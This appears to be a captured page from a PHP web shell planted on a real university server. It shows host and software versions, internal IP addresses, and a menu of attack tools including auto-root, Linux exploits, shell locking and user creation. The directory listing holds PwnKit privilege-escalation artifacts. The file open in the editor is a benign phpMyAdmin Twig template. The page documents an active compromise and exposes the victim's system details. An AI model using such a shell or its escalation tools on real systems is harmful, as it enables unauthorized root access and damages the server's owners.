Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
phpmyadmin /
tmp /
twig /
25 /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
256fe648c1faaeccdba32ec70a436bbd.php
3.66
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 256fe648c1faaeccdba32ec70a436bbd.php
<?php use Twig\Environment; use Twig\Error\LoaderError; use Twig\Error\RuntimeError; use Twig\Extension\SandboxExtension; use Twig\Markup; use Twig\Sandbox\SecurityError; use Twig\Sandbox\SecurityNotAllowedTagError; use Twig\Sandbox\SecurityNotAllowedFilterError; use Twig\Sandbox\SecurityNotAllowedFunctionError; use Twig\Source; use Twig\Template; /* sql/bookmark.twig */ class __TwigTemplate_4cabf3f135924a20246166a852e78814 extends Template { private $source; private $macros = []; public function __construct(Environment $env) { parent::__construct($env); $this->source = $this->getSourceContext(); $this->parent = false; $this->blocks = [ ]; } protected function doDisplay(array $context, array $blocks = []) { $macros = $this->macros; // line 1 echo "<form action=\""; echo PhpMyAdmin\Url::getFromRoute("/sql"); echo "\" method=\"post\" class=\"bookmarkQueryForm d-print-none\" onsubmit=\"return ! Functions.emptyCheckTheField(this, 'bkm_fields[bkm_label]');\"> "; // line 3 echo PhpMyAdmin\Url::getHiddenInputs(); echo " <input type=\"hidden\" name=\"db\" value=\""; // line 4 echo twig_escape_filter($this->env, ($context["db"] ?? null), "html", null, true); echo "\"> <input type=\"hidden\" name=\"goto\" value=\""; // line 5 echo twig_escape_filter($this->env, ($context["goto"] ?? null), "html", null, true); echo "\"> <input type=\"hidden\" name=\"bkm_fields[bkm_database]\" value=\""; // line 6 echo twig_escape_filter($this->env, ($context["db"] ?? null), "html", null, true); echo "\"> <input type=\"hidden\" name=\"bkm_fields[bkm_user]\" value=\""; // line 7 echo twig_escape_filter($this->env, ($context["user"] ?? null), "html", null, true); echo "\"> <input type=\"hidden\" name=\"bkm_fields[bkm_sql_query]\" value=\""; // line 8 echo twig_escape_filter($this->env, ($context["sql_query"] ?? null), "html", null, true); echo "\"> <fieldset class=\"pma-fieldset\"> <legend> "; // line 11 echo PhpMyAdmin\Html\Generator::getIcon("b_bookmark", _gettext("Bookmark this SQL query"), true); echo " </legend> <div class=\"formelement\"> <label> "; echo _gettext("Label:"); // line 16 echo " <input type=\"text\" name=\"bkm_fields[bkm_label]\" value=\"\"> </label> </div> <div class=\"formelement\"> <label> <input type=\"checkbox\" name=\"bkm_all_users\" value=\"true\"> "; echo _gettext("Let every user access this bookmark"); // line 23 echo " </label> </div> <div class=\"clearfloat\"></div> </fieldset> <fieldset class=\"pma-fieldset tblFooters\"> <input type=\"hidden\" name=\"store_bkm\" value=\"1\"> <input class=\"btn btn-secondary\" type=\"submit\" value=\""; echo _gettext("Bookmark this SQL query"); // line 29 echo "\"> </fieldset> </form> "; } public function getTemplateName() { return "sql/bookmark.twig"; } public function isTraitable() { return false; } public function getDebugInfo() { return array ( 95 => 29, 86 => 23, 77 => 16, 69 => 11, 63 => 8, 59 => 7, 55 => 6, 51 => 5, 47 => 4, 43 => 3, 37 => 1,); } public function getSourceContext() { return new Source("", "sql/bookmark.twig", "/opt/lampp/phpmyadmin/templates/sql/bookmark.twig"); } }
Close